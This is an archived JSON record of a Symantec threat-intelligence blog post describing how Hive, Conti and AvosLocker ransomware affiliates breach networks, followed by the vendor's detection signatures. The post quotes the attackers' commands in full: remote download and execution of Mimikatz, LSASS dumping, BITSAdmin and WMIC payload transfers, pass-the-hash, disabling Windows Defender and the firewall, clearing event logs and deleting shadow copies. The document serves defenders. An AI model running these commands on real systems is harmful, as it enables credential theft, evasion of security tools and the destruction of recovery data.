{
	"id": "1ad3fe65-cd85-42a9-8414-dbfc4d533ac7",
	"created_at": "2026-04-06T00:15:53.032388Z",
	"updated_at": "2026-04-10T03:23:51.318731Z",
	"deleted_at": null,
	"sha1_hash": "03c3003dd7a13a7a64e21b55f503dda8ec7bc79d",
	"title": "Ransomware: How Attackers are Breaching Corporate Networks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 75569,
	"plain_text": "Ransomware: How Attackers are Breaching Corporate Networks\r\nArchived: 2026-04-05 21:57:49 UTC\r\nTargeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes.\r\nThe tactics used by ransomware attackers are continually evolving, but by identifying the most frequently\r\nemployed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding of how\r\nransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.\r\nSymantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three\r\nransomware families are being observed in the majority of recent attacks:\r\nHive\r\nConti\r\nAvoslocker\r\nSimilar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service\r\n(RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for\r\nlaunching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed\r\nattack steps laid out by the ransomware operators.\r\nOnce initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to\r\nhelp the operators achieve the following:\r\nGain persistence on the network\r\nEscalate privileges\r\nTamper with and evade security software\r\nLaterally move across the network\r\nInitial Access\r\nAffiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial\r\nfoothold on victim networks. 
Some of these techniques include:\r\nSpear phishing leading to the deployment of malware, including but not limited to:\r\nIcedID\r\nEmotet\r\nQakBot\r\nTrickBot\r\nTaking advantage of weak RDP credentials\r\nExploiting vulnerabilities such as:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 1 of 7\n\nMicrosoft Exchange vulnerabilities - CVE-2021-34473, CVE-2021-34523, CVE-2021-31207,\r\nCVE-2021-26855\r\nFortiGate firewall vulnerabilities - CVE-2018-13379 and CVE-2018-13374\r\nApache Log4j vulnerability - CVE-2021-44228\r\nIn most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros\r\nthat lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use\r\nthis malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware\r\nthreats are then used to distribute ransomware onto compromised computers.\r\nPersistence\r\nAfter gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party\r\nsoftware such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to\r\nvictim networks. They also enable default Remote Desktop access in the firewall:\r\nnetsh advfirewall firewall set rule group=\"Remote Desktop\" new enable=yes\r\nActors are also known to create additional users on compromised systems to maintain access. 
In some instances\r\nwe have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultUserName /t\r\nREG_SZ /d \u003cuser\u003e /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t\r\nREG_SZ /d 1 /f\r\nDiscovery\r\nDuring the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets.\r\nSymantec has observed the aforementioned ransomware actors using tools such as the following:\r\nADRecon - Gathers Active Directory information and generates a report\r\nNetscan - Discovers devices on the network\r\nCredential Access\r\nMimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have\r\nobserved them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also\r\ninstances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:\r\npowershell IEX((new-object\r\nnet.webclient).downloadstring('https://raw.githubusercontent.com/\u003credacted\u003e/Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds\r\nIn addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll\r\ncombination to dump the LSASS memory:\r\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump \u003cprocess id\u003e lsass.dmp full\r\nAdversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. 
On\r\nrare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the\r\ndump to extract valuable credentials.\r\nLateral Movement\r\nAttackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on\r\nvictim networks. We have also observed the attackers using several other techniques to laterally move across\r\nnetworks.\r\nPsExec\r\npsexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\\xxx.exe\r\nWMI\r\nwmic /node:@C:\\share$\\comps1.txt /user:\"user\" /password:\"password\" process call create \"cmd.exe /c bitsadmin\r\n/transfer xxx \\\\IP\\share$\\xxx.exe %APPDATA%\\xxx.exe\u0026%APPDATA%\\xxx.exe\"\r\nBITSAdmin\r\nbitsadmin /transfer debjob /download /priority normal hxxp://\u003cIP\u003e/ele.dll CSIDL_WINDOWS\\ele.dll\r\nMimikatz\r\nmimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:\u003cuser\u003e /domain:\u003cdomain\u003e /ntlm:\u003cntlm hash\u003e\"\r\nDefense Evasion\r\nAs with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security\r\nproducts that interfere with their goal. We have observed them meddling with security services using the net,\r\ntaskkill, and sc commands to disable or terminate them. In some cases they also use tools like PC Hunter to end\r\nprocesses. 
They have also been seen tampering with various registry entries related to security products, since\r\nchanges to the registry entries can make those products inoperative.\r\nBoth Hive and AvosLocker have been observed attempting to disable Windows Defender using the following\r\nreg.exe commands.\r\nAvosLocker:\r\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD\r\n/d 1 /f\r\nHive:\r\nreg.exe delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\r\nPage 3 of 7\n\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t\r\nREG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d\r\n\"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v\r\n\"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v\r\n\"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f\r\nreg.exe add 
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t\r\nREG_DWORD /d \"1\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t\r\nREG_DWORD /d \"0\" /f\r\nreg.exe delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\" /v\r\n\"Windows Defender\" /f\r\nreg.exe delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Windows Defender\" /\r\nDisabling the default Windows firewall is also one of the techniques we have seen being used by these\r\nransomware families:\r\nnetsh advfirewall set allprofiles state off\r\nTo cover their tracks on a victim system the actors may also clear the Windows event log:\r\nwevtutil.exe cl system\r\nwevtutil.exe cl security\r\nwevtutil.exe cl application\r\npowershell -command \"Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }\"\r\nImpact\r\nAdversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators\r\nto recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption\r\nprocess. 
They perform this task by using tools like Vssadmin or WMIC and running one of the following\r\ncommands:\r\nvssadmin.exe delete shadows /all /quiet\r\nwmic.exe shadowcopy delete\r\nWe have also seen BCDEdit being used to disable automatic system recovery and to ignore failures on boot:\r\nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit.exe /set {default} recoveryenabled no\r\nIn some instances the actors delete the safe mode settings in the registry to stop security product services from\r\nstarting in safe mode:\r\nreg delete HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\\u003cservice\u003e /f\r\nExfiltration\r\nAttackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the\r\nstolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following\r\ncloud services to exfiltrate data:\r\nhttps://anonfiles.com\r\nhttps://mega.nz\r\nhttps://send.exploit.in\r\nhttps://ufile.io\r\nhttps://www.sendspace.com\r\nWe have also seen attackers use the following tools for data exfiltration:\r\nFilezilla\r\nRclone\r\nConclusion\r\nThe TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these\r\nthreat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver\r\ntheir targets’ security defenses. 
As such, organizations need to be vigilant and employ a multi-layered security\r\napproach.\r\nSymantec Protection\r\nSymantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic\r\ntechnologies.\r\nAV Protection\r\nRansom.Hive\r\nRansom.Conti\r\nRansom.AvosLocker\r\nBackdoor.Cobalt\r\nHacktool.Mimikatz\r\nTrojan.IcedID*\r\nTrojan.Emotet*\r\nW32.Qakbot*\r\nTrojan.Trickybot*\r\nBehavioral Protection\r\nSONAR.RansomHive!g2\r\nSONAR.RansomHive!g3\r\nSONAR.RansomHive!g4\r\nSONAR.RansomAvos!g2\r\nSONAR.RansomConti!g1\r\nSONAR.RansomConti!g3\r\nSONAR.RansomConti!g4\r\nSONAR.Ransomware!g30\r\nSONAR.RansomGregor!g1\r\nSONAR.SuspLaunch!gen4\r\nSONAR.SuspLaunch!g18\r\nSONAR.Ransom!gen59\r\nSONAR.Ransomware!g26\r\nSONAR.Cryptlck!g171\r\nIntrusion Prevention System (IPS) detections\r\nIPS blocks initial access, persistence, and lateral movement. SEP's Audit Signatures are intended to raise\r\nawareness of potentially unwanted traffic on the network. 
By default, Audit Signatures do not block.\r\nAdministrators reviewing the logs of IPS events in their network can note these Audit events and decide whether\r\nor not to configure the corresponding Audit Signatures to block the traffic.\r\nThe following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use\r\nof software or tools such as AnyDesk, ScreenConnect, and PsExec.\r\n33211 [Audit: AnyDesk Remote Desktop Activity]\r\n33156 [Audit: ScreenConnect Remote Support Software Activity]\r\n30068 [Audit: PSExec Utility Activity]\r\n33588 [Audit: WMIC Remote RPC Interface Bind Attempt]\r\n33311 [Audit: PCHunter Tool Activity]\r\n33295 [Attack: Ransom.Conti Activity 3]\r\n33435 [Attack: Ransom.AvosLocker Activity 3]\r\n33444 [Attack: Ransom.AvosLocker Activity 4]\r\n32436 [Attack: Ransom.Gen Activity 29]\r\n33323 [Attack: Ransom.Hive Activity]\r\n33119 [Audit: RClone Tool Activity]\r\nSymantec recommends that you have intrusion prevention enabled on all your devices including servers.\r\nAdaptive Protection\r\nSymantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques\r\nused by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you\r\nshould “Deny” these applications and actions using Symantec Adaptive Protection policies.\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker"
	],
	"report_names": [
		"ransomware-hive-conti-avoslocker"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434553,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/03c3003dd7a13a7a64e21b55f503dda8ec7bc79d.pdf",
		"text": "https://archive.orkl.eu/03c3003dd7a13a7a64e21b55f503dda8ec7bc79d.txt",
		"img": "https://archive.orkl.eu/03c3003dd7a13a7a64e21b55f503dda8ec7bc79d.jpg"
	}
}